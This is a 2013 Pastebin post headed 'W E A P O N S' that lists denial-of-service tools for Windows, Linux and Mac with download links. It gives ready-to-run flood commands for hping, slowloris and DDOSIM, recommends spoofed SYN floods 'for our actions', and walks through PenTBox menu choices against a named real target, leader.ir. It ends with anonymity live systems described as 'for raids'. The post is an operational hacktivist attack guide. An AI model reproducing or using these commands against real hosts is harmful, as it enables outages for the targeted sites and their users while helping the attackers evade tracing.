Advertisement
87aCk_X

Tools....

Aug 30th, 2013
706
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.14 KB | None | 0 0
  1. | W E A P O N S |
  2.  
  3.  
  4.  
  5.  
  6.  
  7. windows
  8. -----------------------------------------------------------------------------------------------------
  9. LOIC
  10. Download:
  11. https://github.com/NewEraCracker/LOIC/downloads
  12. Usage:
  13.  
  14. HOIC
  15. Download:
  16. http://hoic.99k.org
  17.  
  18. Pentbox
  19. http://www.pentbox.net/download-pentbox/
  20.  
  21.  
  22. Slowloris
  23. http://www.multiupload.nl/8KT494DULW
  24.  
  25. Usage:
  26. http://pastebin.com/5deha9Ug
  27.  
  28.  
  29. r-u-dead-yet?
  30. http://www.hybridsec.com/tools/rudy/
  31.  
  32.  
  33. hping2
  34. Download:
  35. http://www.hping.org/
  36. hping[2 or 3] [TARGET] -p [PORT] --flood [PACKET TYPE] [OTHER OPTIONS]
  37. 4 moar options take a look @ http://pastebin.com/uM1MjN4b
  38.  
  39.  
  40.  
  41. for advanced users:
  42. http://www.thc.org/thc-ssl-dos/
  43.  
  44.  
  45.  
  46. linux
  47. ---------------------------------------------------------------------------------------------------------
  48.  
  49. Pentbox includes :
  50. TCP Flood DoSer
  51. TCP Flood AutoDoSer
  52. Spoofed SYN Flood DoSer [nmap - hping3] <-- best 4 our actions!
  53. Port scanner
  54. Honeypot
  55. PenTBox Secure Instant Messaging
  56. No Hivemode mode included, must fire manually.
  57.  
  58. Download:
  59. http://www.pentbox.net/download-pentbox/ <---
  60. use it as standalone or better with hping3 (see above)
  61.  
  62. startin terminal:
  63. sudo su
  64. cd pentbox
  65. ruby pentbox.rb
  66.  
  67. then type:
  68. 2
  69. 1
  70. 2
  71. input target example: leader.ir
  72. input target port : 80
  73. as default u use random sources but for beeing more effective use it with ur own packages.
  74.  
  75.  
  76. hping3
  77. Download:
  78. http://www.hping.org/hping3-20051105.tar.gz
  79.  
  80. Usage:
  81. hping[2 or 3] [TARGET] -p [PORT] --flood [PACKET TYPE] [OTHER OPTIONS]
  82. 4 moar options take a look @ http://pastebin.com/uM1MjN4b
  83.  
  84.  
  85. slowloris
  86. http://ha.ckers.org/slowloris/
  87.  
  88. Download & Install:
  89. http://ha.ckers.org/slowloris/slowloris.pl
  90.  
  91. perl -MCPAN -e 'install IO::Socket::INET'
  92. perl -MCPAN -e 'install IO::Socket::SSL' | http://search.cpan.org/CPAN/authors/id/B/BE/BEHROOZI/IO-Socket-SSL-0.97.tar.gz
  93. perl -MCPAN -e ’install GetOpt::Long' | http://search.cpan.org/CPAN/authors/id/J/JV/JV/Getopt-Long-2.38.tar.gz
  94.  
  95. Usage:
  96. sudo su
  97. perl slowloris.pl
  98.  
  99. examples:
  100. http ddos ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
  101. https ddos ./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
  102. 4 moar options take a look @ http://pastebin.com/uM1MjN4b
  103.  
  104.  
  105. loiq
  106. http://sourceforge.net/projects/loiq/files/
  107.  
  108.  
  109. pyloris
  110. ...can utilize SOCKS proxies and SSL connections, and can target protocols such as HTTP, FTP, SMTP, IMAP, and Telnet.
  111.  
  112. Download:
  113. http://sourceforge.net/projects/pyloris/files/pyloris/3.2/pyloris-3.2.tgz/download
  114.  
  115.  
  116. pyloic (python loic)
  117.  
  118. Download:
  119. https://github.com/kenkeiras/pyLOIC/downloads
  120.  
  121. Usage:
  122.  
  123.  
  124. r-u-dead-yet?
  125. Download:
  126. http://www.hybridsec.com/tools/rudy/
  127.  
  128.  
  129. DDOSIM
  130. Info:
  131. http://stormsecurity.wordpress.com/2009/03/03/application-layer-ddos-simulator/
  132. Download:
  133. http://sourceforge.net/projects/ddosim/files/ddosim-0.2.tar.gz/download
  134.  
  135. Usage:
  136. ./ddosim
  137. -d IP Target IP address
  138. -p PORT Target port
  139. [-k NET] Source IP from class C network (ex. 10.4.4.0)
  140. [-i IFNAME] Output interface name
  141. [-c COUNT] Number of connections to establish
  142. [-w DELAY] Delay (in milliseconds) between SYN packets
  143. [-r TYPE] Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
  144. [-t NRTHREADS] Number of threads to use when sending packets (default 1)
  145. [-n] Do not spoof source address (use local address)
  146. [-v] Verbose mode (slower)
  147. [-h] Print this help message
  148. Examples:
  149. 1. Establish 10 TCP connections from random IP addresses to www server and send invalid HTTP requests (similar to a DC++ based attack):
  150. ./ddosim -d 192.168.1.2 -p 80 -c 10 -r HTTP_INVALID -i eth0
  151. 2. Establish infinite connections from source network 10.4.4.0 to SMTP server and send EHLO requests:
  152. ./ddosim -d 192.168.1.2 -p 25 -k 10.4.4.0 -c 0 -r SMTP_EHLO -i eth0
  153. 3. Establish infinite connections at higher speed to www server and make HTTP valid requests:
  154. ./ddosim -d 192.168.1.2 -p 80 -c 0 -w 0 -t 10 -r HTTP_VALID -i eth0
  155. 4. Establish infinite TCP connections (without sending a Layer 7 request) from local address to a POP3 server:
  156. ./ddosim -d 192.168.1.2 -p 110 -c 0 -i eth0
  157.  
  158.  
  159.  
  160. for advanced users:
  161. http://www.thc.org/thc-ssl-dos/
  162.  
  163.  
  164.  
  165. MAC
  166. ---------------------------------------------------------------------------------------------------------
  167. ZAP
  168. http://www.cowfight.com/cf4/zapattack/
  169. http://www.cowfight.com/cf4/zapattack/
  170.  
  171.  
  172. Pentbox
  173. http://www.pentbox.net/download-pentbox/
  174.  
  175.  
  176. HowTo use LOIC (or others) on a MAC using MONO:
  177. https://github.com/NewEraCracker/LOIC/wiki/How-to-run-LOIC-using-Mono
  178.  
  179.  
  180.  
  181.  
  182. Operation Systems
  183. ---------------------------------------------------------------------------------------------------------
  184. http://insurgen.cc/index.php?title=L/i/nux
  185. http://insurgen.cc/index.php?title=W/i/ndows
  186.  
  187.  
  188. AnonOS
  189. http://operationcelebration.net/wiki/AnonOS
  190.  
  191.  
  192. Annonaceae v.0.0.3 MELCHISEDEK (PROJECT BASIS.) http://www.filefactory.com/file/b513ah8/n/annonaceae.iso
  193.  
  194.  
  195. AnonOS (Strictly Defensive)
  196. Rebulding is planned! v0.1 (initial!) http://piratenpad.de/AnonOS-v0-1 Documentation: http://piratepad.net/3540VLXFg7
  197.  
  198.  
  199. Cherimoya Internet Security LiveCD (for raids)
  200. v.0.0.1 MELCHISEDEK (Merged from another project) http://ge.tt/3nrRkBf Documentation: http://piratepad.net/3540VLXFg7
  201.  
  202.  
  203. TAILS
  204. https://amnesia.boum.org/
  205. Download:
  206. http://dl.amnesia.boum.org/tails/stable/
  207.  
  208.  
  209. AnonymOS
  210. http://sourceforge.net/projects/anonym-os/files/Anonym.OS%20Live%20CD/ShmooCon%202006/anonymos-shmoo.iso/download
  211.  
  212.  
  213. Liberte Linux - persistent,portable USB OS 4 anon communikation
  214. http://dee.su/liberte
  215.  
  216. Download:
  217. http://sourceforge.net/projects/liberte/files/2010.1/liberte-2010.1.zip/download
  218.  
  219.  
  220. Privatix - persistent,portable USB OS 4 privacy & encryption
  221. http://download.kommunikationssystem.de/privatix_10.02.07_de.iso
  222.  
  223.  
  224. to make linux distros portable use http://unetbootin.sourceforge.net/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement